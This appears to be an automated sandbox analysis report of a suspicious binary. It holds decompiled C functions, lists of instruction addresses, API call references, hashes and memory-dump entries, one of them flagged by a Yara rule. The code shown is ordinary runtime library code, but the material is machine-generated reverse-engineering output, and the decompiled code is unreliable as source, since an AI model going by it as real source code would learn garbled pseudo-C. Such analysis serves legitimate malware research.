                                                                                                                                                                                                                                                                                          • Instruction ID: 6186c238f5554303396dbe8439228427f2270015e2377f7843786e57d66b4522
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 15015354eaba06c8285cebec87d7585f8e916efe4fcf6e365cde459ddbf30ac4
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55E0BF32D07215AFDB459B19FE185F63B74EF49319B084010FA0897920D37559C6CA56
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E000FFB00() {
                                                                                                                                                                                                                                                                                          				intOrPtr _t1;
                                                                                                                                                                                                                                                                                          				intOrPtr _t2;
                                                                                                                                                                                                                                                                                          				intOrPtr _t4;
                                                                                                                                                                                                                                                                                          				struct _CRITICAL_SECTION* _t5;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t1 =  *0x1719a8; // 0x0
                                                                                                                                                                                                                                                                                          				if(_t1 == 0) {
                                                                                                                                                                                                                                                                                          					_t4 =  *0x17196c; // 0x1719bc
                                                                                                                                                                                                                                                                                          					_t5 = _t4 + 0x10;
                                                                                                                                                                                                                                                                                          					EnterCriticalSection(_t5);
                                                                                                                                                                                                                                                                                          					if( *0x1719a8 == 0) {
                                                                                                                                                                                                                                                                                          						 *0x1719a8 = RegisterWindowMessageA("WTL_CmdBar_InternalGetBarMsg");
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					LeaveCriticalSection(_t5);
                                                                                                                                                                                                                                                                                          					_t2 =  *0x1719a8; // 0x0
                                                                                                                                                                                                                                                                                          					return _t2;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _t1;
                                                                                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                                                                                          0x000ffb00
                                                                                                                                                                                                                                                                                          0x000ffb08
                                                                                                                                                                                                                                                                                          0x000ffb0a
                                                                                                                                                                                                                                                                                          0x000ffb10
                                                                                                                                                                                                                                                                                          0x000ffb14
                                                                                                                                                                                                                                                                                          0x000ffb21
                                                                                                                                                                                                                                                                                          0x000ffb2e
                                                                                                                                                                                                                                                                                          0x000ffb2e
                                                                                                                                                                                                                                                                                          0x000ffb34
                                                                                                                                                                                                                                                                                          0x000ffb3a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000ffb3a
                                                                                                                                                                                                                                                                                          0x000ffb40

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(001719AC,?,000FC34D), ref: 000FFB14
                                                                                                                                                                                                                                                                                          • RegisterWindowMessageA.USER32(WTL_CmdBar_InternalGetBarMsg), ref: 000FFB28
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(001719AC), ref: 000FFB34
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • WTL_CmdBar_InternalGetBarMsg, xrefs: 000FFB23
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeaveMessageRegisterWindow
                                                                                                                                                                                                                                                                                          • String ID: WTL_CmdBar_InternalGetBarMsg
                                                                                                                                                                                                                                                                                          • API String ID: 6923546-1327875102
                                                                                                                                                                                                                                                                                          • Opcode ID: f7e2084e69ca487dab56f0af779fe5f85d4d59496911ef7e1b817e1801607ab5
                                                                                                                                                                                                                                                                                          • Instruction ID: 1959cbd77965d9deeb93f288b97c5baad692a2283876c4d2ea7d9c8c4159ee77
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f7e2084e69ca487dab56f0af779fe5f85d4d59496911ef7e1b817e1801607ab5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09E0B636D02215BFDB459B18FD69AE677B4AB0931AB444020FA08A2920C7755ACBCB96
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 0252AE57
                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 0252AEA6
                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 0252AEB0
                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 0252AEC8
                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 0252AEE0
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: lstrlen$lstrcat
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 493641738-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 35d9e52ac383ca9180f4409b48d3a1ff78ea3681c8e39d1029901aa48980c775
                                                                                                                                                                                                                                                                                          • Instruction ID: dce18052e36e6ab5e3b8c18bfe617f69dd11d6f1119d08963731fb34039706c5
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35d9e52ac383ca9180f4409b48d3a1ff78ea3681c8e39d1029901aa48980c775
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB218E7080035AEFDF14CFA4C988BAE7BB5FF45304F148958E944A72C0D3789A99CB91
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 97%
                                                                                                                                                                                                                                                                                          			E00105BAB(void* __ebx, void* __edi, signed char* _a4, signed int _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                          				signed int _v7;
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                                                                                                                          				signed int _t72;
                                                                                                                                                                                                                                                                                          				signed int _t74;
                                                                                                                                                                                                                                                                                          				intOrPtr _t75;
                                                                                                                                                                                                                                                                                          				void* _t77;
                                                                                                                                                                                                                                                                                          				intOrPtr _t79;
                                                                                                                                                                                                                                                                                          				signed short _t82;
                                                                                                                                                                                                                                                                                          				void* _t84;
                                                                                                                                                                                                                                                                                          				signed short _t87;
                                                                                                                                                                                                                                                                                          				intOrPtr _t91;
                                                                                                                                                                                                                                                                                          				signed int _t97;
                                                                                                                                                                                                                                                                                          				signed int _t100;
                                                                                                                                                                                                                                                                                          				void* _t101;
                                                                                                                                                                                                                                                                                          				signed int _t102;
                                                                                                                                                                                                                                                                                          				void* _t103;
                                                                                                                                                                                                                                                                                          				signed int _t104;
                                                                                                                                                                                                                                                                                          				signed char* _t114;
                                                                                                                                                                                                                                                                                          				signed char* _t115;
                                                                                                                                                                                                                                                                                          				signed int _t116;
                                                                                                                                                                                                                                                                                          				signed int _t117;
                                                                                                                                                                                                                                                                                          				signed int _t118;
                                                                                                                                                                                                                                                                                          				signed int _t124;
                                                                                                                                                                                                                                                                                          				signed int _t125;
                                                                                                                                                                                                                                                                                          				void* _t127;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				E001059F5(__ebx,  &_v24, __edi, _a12);
                                                                                                                                                                                                                                                                                          				_t114 = _a4;
                                                                                                                                                                                                                                                                                          				_t129 = _t114;
                                                                                                                                                                                                                                                                                          				if(_t114 != 0) {
                                                                                                                                                                                                                                                                                          					_push(__ebx);
                                                                                                                                                                                                                                                                                          					_t97 = _a8;
                                                                                                                                                                                                                                                                                          					__eflags = _t97;
                                                                                                                                                                                                                                                                                          					if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          						_t72 = _v20;
                                                                                                                                                                                                                                                                                          						__eflags =  *(_t72 + 8);
                                                                                                                                                                                                                                                                                          						if( *(_t72 + 8) != 0) {
                                                                                                                                                                                                                                                                                          							_push(__edi);
                                                                                                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                                                                                                          								_t100 =  *_t114 & 0x000000ff;
                                                                                                                                                                                                                                                                                          								_t124 = _t100 & 0x000000ff;
                                                                                                                                                                                                                                                                                          								_t115 =  &(_t114[1]);
                                                                                                                                                                                                                                                                                          								__eflags =  *(_t124 + _t72 + 0x1d) & 0x00000004;
                                                                                                                                                                                                                                                                                          								_a4 = _t115;
                                                                                                                                                                                                                                                                                          								if(( *(_t124 + _t72 + 0x1d) & 0x00000004) == 0) {
                                                                                                                                                                                                                                                                                          									goto L20;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								__eflags =  *_t115;
                                                                                                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          									_t84 = E00108008(_t97, 0x200, __eflags,  &_v24,  *((intOrPtr*)(_t72 + 0xc)), 0x200, _t115 - 1, 2,  &_v8, 2,  *((intOrPtr*)(_t72 + 4)), 1);
                                                                                                                                                                                                                                                                                          									_t127 = _t127 + 0x24;
                                                                                                                                                                                                                                                                                          									__eflags = _t84 - 1;
                                                                                                                                                                                                                                                                                          									if(_t84 != 1) {
                                                                                                                                                                                                                                                                                          										__eflags = _t84 - 2;
                                                                                                                                                                                                                                                                                          										if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          											goto L37;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											_t87 = (_v8 & 0x000000ff) * 0x100 + (_v7 & 0x000000ff);
                                                                                                                                                                                                                                                                                          											__eflags = _t87;
                                                                                                                                                                                                                                                                                          											_t125 = _t87 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          											goto L19;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										_t125 = _v8 & 0x000000ff;
                                                                                                                                                                                                                                                                                          										L19:
                                                                                                                                                                                                                                                                                          										_a4 =  &(_a4[1]);
                                                                                                                                                                                                                                                                                          										_t72 = _v20;
                                                                                                                                                                                                                                                                                          										goto L23;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t125 = 0;
                                                                                                                                                                                                                                                                                          									L23:
                                                                                                                                                                                                                                                                                          									_t102 =  *_t97 & 0x000000ff;
                                                                                                                                                                                                                                                                                          									_t117 = _t102 & 0x000000ff;
                                                                                                                                                                                                                                                                                          									_t97 = _t97 + 1;
                                                                                                                                                                                                                                                                                          									__eflags =  *(_t117 + _t72 + 0x1d) & 0x00000004;
                                                                                                                                                                                                                                                                                          									if(( *(_t117 + _t72 + 0x1d) & 0x00000004) == 0) {
                                                                                                                                                                                                                                                                                          										_t118 = _t102;
                                                                                                                                                                                                                                                                                          										_t103 = _t118 + _t72;
                                                                                                                                                                                                                                                                                          										__eflags =  *(_t103 + 0x1d) & 0x00000010;
                                                                                                                                                                                                                                                                                          										if(( *(_t103 + 0x1d) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                          											_t104 = _t118;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											_t104 =  *(_t103 + 0x11d) & 0x000000ff;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										goto L34;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										__eflags =  *_t97;
                                                                                                                                                                                                                                                                                          										if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          											_t77 = E00108008(_t97, 0x200, __eflags,  &_v24,  *((intOrPtr*)(_t72 + 0xc)), 0x200, _t97 - 1, 2,  &_v8, 2,  *((intOrPtr*)(_t72 + 4)), 1);
                                                                                                                                                                                                                                                                                          											_t127 = _t127 + 0x24;
                                                                                                                                                                                                                                                                                          											__eflags = _t77 - 1;
                                                                                                                                                                                                                                                                                          											if(_t77 != 1) {
                                                                                                                                                                                                                                                                                          												__eflags = _t77 - 2;
                                                                                                                                                                                                                                                                                          												if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          													L37:
                                                                                                                                                                                                                                                                                          													 *((intOrPtr*)(E00107A0D(__eflags))) = 0x16;
                                                                                                                                                                                                                                                                                          													__eflags = _v12;
                                                                                                                                                                                                                                                                                          													if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          														_t79 = _v16;
                                                                                                                                                                                                                                                                                          														_t61 = _t79 + 0x70;
                                                                                                                                                                                                                                                                                          														 *_t61 =  *(_t79 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                                                                                                          														__eflags =  *_t61;
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          													_t74 = 0x7fffffff;
                                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                                          													_t82 = (_v8 & 0x000000ff) * 0x100 + (_v7 & 0x000000ff);
                                                                                                                                                                                                                                                                                          													__eflags = _t82;
                                                                                                                                                                                                                                                                                          													_t104 = _t82 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          													goto L30;
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                                          												_t104 = _v8 & 0x000000ff;
                                                                                                                                                                                                                                                                                          												L30:
                                                                                                                                                                                                                                                                                          												_t72 = _v20;
                                                                                                                                                                                                                                                                                          												_t97 = _t97 + 1;
                                                                                                                                                                                                                                                                                          												goto L34;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											_t104 = 0;
                                                                                                                                                                                                                                                                                          											L34:
                                                                                                                                                                                                                                                                                          											__eflags = _t104 - _t125;
                                                                                                                                                                                                                                                                                          											if(_t104 != _t125) {
                                                                                                                                                                                                                                                                                          												asm("sbb eax, eax");
                                                                                                                                                                                                                                                                                          												_t74 = (_t72 & 0x00000002) - 1;
                                                                                                                                                                                                                                                                                          												__eflags = _v12;
                                                                                                                                                                                                                                                                                          												if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          													 *(_v16 + 0x70) =  *(_v16 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                                          												__eflags = _t125;
                                                                                                                                                                                                                                                                                          												if(_t125 == 0) {
                                                                                                                                                                                                                                                                                          													__eflags = _v12;
                                                                                                                                                                                                                                                                                          													if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          														_t75 = _v16;
                                                                                                                                                                                                                                                                                          														_t69 = _t75 + 0x70;
                                                                                                                                                                                                                                                                                          														 *_t69 =  *(_t75 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                                                                                                          														__eflags =  *_t69;
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          													_t74 = 0;
                                                                                                                                                                                                                                                                                          													__eflags = 0;
                                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                                          													_t114 = _a4;
                                                                                                                                                                                                                                                                                          													continue;
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								goto L46;
                                                                                                                                                                                                                                                                                          								L20:
                                                                                                                                                                                                                                                                                          								_t116 = _t100;
                                                                                                                                                                                                                                                                                          								_t101 = _t116 + _t72;
                                                                                                                                                                                                                                                                                          								__eflags =  *(_t101 + 0x1d) & 0x00000010;
                                                                                                                                                                                                                                                                                          								if(( *(_t101 + 0x1d) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                          									_t125 = _t116;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t125 =  *(_t101 + 0x11d) & 0x000000ff;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								goto L23;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t74 = E00108087(_t114, __edi, _t114, _t97,  &_v24);
                                                                                                                                                                                                                                                                                          							__eflags = _v12;
                                                                                                                                                                                                                                                                                          							if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          								 *(_v16 + 0x70) =  *(_v16 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(E00107A0D(__eflags))) = 0x16;
                                                                                                                                                                                                                                                                                          						E001079BB();
                                                                                                                                                                                                                                                                                          						__eflags = _v12 - _t97;
                                                                                                                                                                                                                                                                                          						if(_v12 != _t97) {
                                                                                                                                                                                                                                                                                          							_t91 = _v16;
                                                                                                                                                                                                                                                                                          							_t11 = _t91 + 0x70;
                                                                                                                                                                                                                                                                                          							 *_t11 =  *(_t91 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                                                                                                          							__eflags =  *_t11;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t74 = 0x7fffffff;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					L46:
                                                                                                                                                                                                                                                                                          					return _t74;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(E00107A0D(_t129))) = 0x16;
                                                                                                                                                                                                                                                                                          					E001079BB();
                                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          						 *(_v16 + 0x70) =  *(_v16 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					return 0x7fffffff;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}
































                                                                                                                                                                                                                                                                                          0x00105bb9
                                                                                                                                                                                                                                                                                          0x00105bbe
                                                                                                                                                                                                                                                                                          0x00105bc1
                                                                                                                                                                                                                                                                                          0x00105bc3
                                                                                                                                                                                                                                                                                          0x00105be9
                                                                                                                                                                                                                                                                                          0x00105bea
                                                                                                                                                                                                                                                                                          0x00105bed
                                                                                                                                                                                                                                                                                          0x00105bef
                                                                                                                                                                                                                                                                                          0x00105c17
                                                                                                                                                                                                                                                                                          0x00105c1a
                                                                                                                                                                                                                                                                                          0x00105c1e
                                                                                                                                                                                                                                                                                          0x00105c44
                                                                                                                                                                                                                                                                                          0x00105c4b
                                                                                                                                                                                                                                                                                          0x00105c4b
                                                                                                                                                                                                                                                                                          0x00105c4e
                                                                                                                                                                                                                                                                                          0x00105c51
                                                                                                                                                                                                                                                                                          0x00105c52
                                                                                                                                                                                                                                                                                          0x00105c57
                                                                                                                                                                                                                                                                                          0x00105c5a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00105c5c
                                                                                                                                                                                                                                                                                          0x00105c5f
                                                                                                                                                                                                                                                                                          0x00105c7c
                                                                                                                                                                                                                                                                                          0x00105c81
                                                                                                                                                                                                                                                                                          0x00105c84
                                                                                                                                                                                                                                                                                          0x00105c87
                                                                                                                                                                                                                                                                                          0x00105c8f
                                                                                                                                                                                                                                                                                          0x00105c92
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00105c98
                                                                                                                                                                                                                                                                                          0x00105ca9
                                                                                                                                                                                                                                                                                          0x00105ca9
                                                                                                                                                                                                                                                                                          0x00105cac
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00105cac
                                                                                                                                                                                                                                                                                          0x00105c89
                                                                                                                                                                                                                                                                                          0x00105c89
                                                                                                                                                                                                                                                                                          0x00105caf
                                                                                                                                                                                                                                                                                          0x00105caf
                                                                                                                                                                                                                                                                                          0x00105cb2
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00105cb2
                                                                                                                                                                                                                                                                                          0x00105c61
                                                                                                                                                                                                                                                                                          0x00105c61
                                                                                                                                                                                                                                                                                          0x00105ccd
                                                                                                                                                                                                                                                                                          0x00105ccd
                                                                                                                                                                                                                                                                                          0x00105cd0
                                                                                                                                                                                                                                                                                          0x00105cd3
                                                                                                                                                                                                                                                                                          0x00105cd4
                                                                                                                                                                                                                                                                                          0x00105cd9
                                                                                                                                                                                                                                                                                          0x00105d32
                                                                                                                                                                                                                                                                                          0x00105d34
                                                                                                                                                                                                                                                                                          0x00105d37
                                                                                                                                                                                                                                                                                          0x00105d3b
                                                                                                                                                                                                                                                                                          0x00105d46
                                                                                                                                                                                                                                                                                          0x00105d3d
                                                                                                                                                                                                                                                                                          0x00105d3d
                                                                                                                                                                                                                                                                                          0x00105d3d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00105cdb
                                                                                                                                                                                                                                                                                          0x00105cdb
                                                                                                                                                                                                                                                                                          0x00105cde
                                                                                                                                                                                                                                                                                          0x00105cfd
                                                                                                                                                                                                                                                                                          0x00105d02
                                                                                                                                                                                                                                                                                          0x00105d05
                                                                                                                                                                                                                                                                                          0x00105d08
                                                                                                                                                                                                                                                                                          0x00105d10
                                                                                                                                                                                                                                                                                          0x00105d13
                                                                                                                                                                                                                                                                                          0x00105d5a
                                                                                                                                                                                                                                                                                          0x00105d5f
                                                                                                                                                                                                                                                                                          0x00105d65
                                                                                                                                                                                                                                                                                          0x00105d69
                                                                                                                                                                                                                                                                                          0x00105d6b
                                                                                                                                                                                                                                                                                          0x00105d6e
                                                                                                                                                                                                                                                                                          0x00105d6e
                                                                                                                                                                                                                                                                                          0x00105d6e
                                                                                                                                                                                                                                                                                          0x00105d6e
                                                                                                                                                                                                                                                                                          0x00105d72
                                                                                                                                                                                                                                                                                          0x00105d15
                                                                                                                                                                                                                                                                                          0x00105d26
                                                                                                                                                                                                                                                                                          0x00105d26
                                                                                                                                                                                                                                                                                          0x00105d29
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00105d29
                                                                                                                                                                                                                                                                                          0x00105d0a
                                                                                                                                                                                                                                                                                          0x00105d0a
                                                                                                                                                                                                                                                                                          0x00105d2c
                                                                                                                                                                                                                                                                                          0x00105d2c
                                                                                                                                                                                                                                                                                          0x00105d2f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00105d2f
                                                                                                                                                                                                                                                                                          0x00105ce0
                                                                                                                                                                                                                                                                                          0x00105ce0
                                                                                                                                                                                                                                                                                          0x00105d48
                                                                                                                                                                                                                                                                                          0x00105d48
                                                                                                                                                                                                                                                                                          0x00105d4b
                                                                                                                                                                                                                                                                                          0x00105d79
                                                                                                                                                                                                                                                                                          0x00105d7e
                                                                                                                                                                                                                                                                                          0x00105d7f
                                                                                                                                                                                                                                                                                          0x00105d83
                                                                                                                                                                                                                                                                                          0x00105d88
                                                                                                                                                                                                                                                                                          0x00105d88
                                                                                                                                                                                                                                                                                          0x00105d4d
                                                                                                                                                                                                                                                                                          0x00105d4d
                                                                                                                                                                                                                                                                                          0x00105d50
                                                                                                                                                                                                                                                                                          0x00105d8e
                                                                                                                                                                                                                                                                                          0x00105d92
                                                                                                                                                                                                                                                                                          0x00105d94
                                                                                                                                                                                                                                                                                          0x00105d97
                                                                                                                                                                                                                                                                                          0x00105d97
                                                                                                                                                                                                                                                                                          0x00105d97
                                                                                                                                                                                                                                                                                          0x00105d97
                                                                                                                                                                                                                                                                                          0x00105d9b
                                                                                                                                                                                                                                                                                          0x00105d9b
                                                                                                                                                                                                                                                                                          0x00105d52
                                                                                                                                                                                                                                                                                          0x00105d52
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00105d52
                                                                                                                                                                                                                                                                                          0x00105d50
                                                                                                                                                                                                                                                                                          0x00105d4b
                                                                                                                                                                                                                                                                                          0x00105cde
                                                                                                                                                                                                                                                                                          0x00105cd9
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00105cb7
                                                                                                                                                                                                                                                                                          0x00105cb7
                                                                                                                                                                                                                                                                                          0x00105cb9
                                                                                                                                                                                                                                                                                          0x00105cbc
                                                                                                                                                                                                                                                                                          0x00105cc0
                                                                                                                                                                                                                                                                                          0x00105ccb
                                                                                                                                                                                                                                                                                          0x00105cc2
                                                                                                                                                                                                                                                                                          0x00105cc2
                                                                                                                                                                                                                                                                                          0x00105cc2
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00105cc0
                                                                                                                                                                                                                                                                                          0x00105c20
                                                                                                                                                                                                                                                                                          0x00105c26
                                                                                                                                                                                                                                                                                          0x00105c2e
                                                                                                                                                                                                                                                                                          0x00105c32
                                                                                                                                                                                                                                                                                          0x00105c3b
                                                                                                                                                                                                                                                                                          0x00105c3b
                                                                                                                                                                                                                                                                                          0x00105c32
                                                                                                                                                                                                                                                                                          0x00105bf1
                                                                                                                                                                                                                                                                                          0x00105bf6
                                                                                                                                                                                                                                                                                          0x00105bfc
                                                                                                                                                                                                                                                                                          0x00105c01
                                                                                                                                                                                                                                                                                          0x00105c04
                                                                                                                                                                                                                                                                                          0x00105c06
                                                                                                                                                                                                                                                                                          0x00105c09
                                                                                                                                                                                                                                                                                          0x00105c09
                                                                                                                                                                                                                                                                                          0x00105c09
                                                                                                                                                                                                                                                                                          0x00105c09
                                                                                                                                                                                                                                                                                          0x00105c0d
                                                                                                                                                                                                                                                                                          0x00105c0d
                                                                                                                                                                                                                                                                                          0x00105d9f
                                                                                                                                                                                                                                                                                          0x00105da1
                                                                                                                                                                                                                                                                                          0x00105bc5
                                                                                                                                                                                                                                                                                          0x00105bca
                                                                                                                                                                                                                                                                                          0x00105bd0
                                                                                                                                                                                                                                                                                          0x00105bd9
                                                                                                                                                                                                                                                                                          0x00105bde
                                                                                                                                                                                                                                                                                          0x00105bde
                                                                                                                                                                                                                                                                                          0x00105be8
                                                                                                                                                                                                                                                                                          0x00105be8

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00105BB9
                                                                                                                                                                                                                                                                                            • Part of subcall function 001059F5: __getptd.LIBCMT ref: 00105A08
                                                                                                                                                                                                                                                                                            • Part of subcall function 00107A0D: __getptd_noexit.LIBCMT ref: 00107A0D
                                                                                                                                                                                                                                                                                          • __stricmp_l.LIBCMT ref: 00105C26
                                                                                                                                                                                                                                                                                            • Part of subcall function 00108087: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00108096
                                                                                                                                                                                                                                                                                          • ___crtLCMapStringA.LIBCMT ref: 00105C7C
                                                                                                                                                                                                                                                                                          • ___crtLCMapStringA.LIBCMT ref: 00105CFD
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
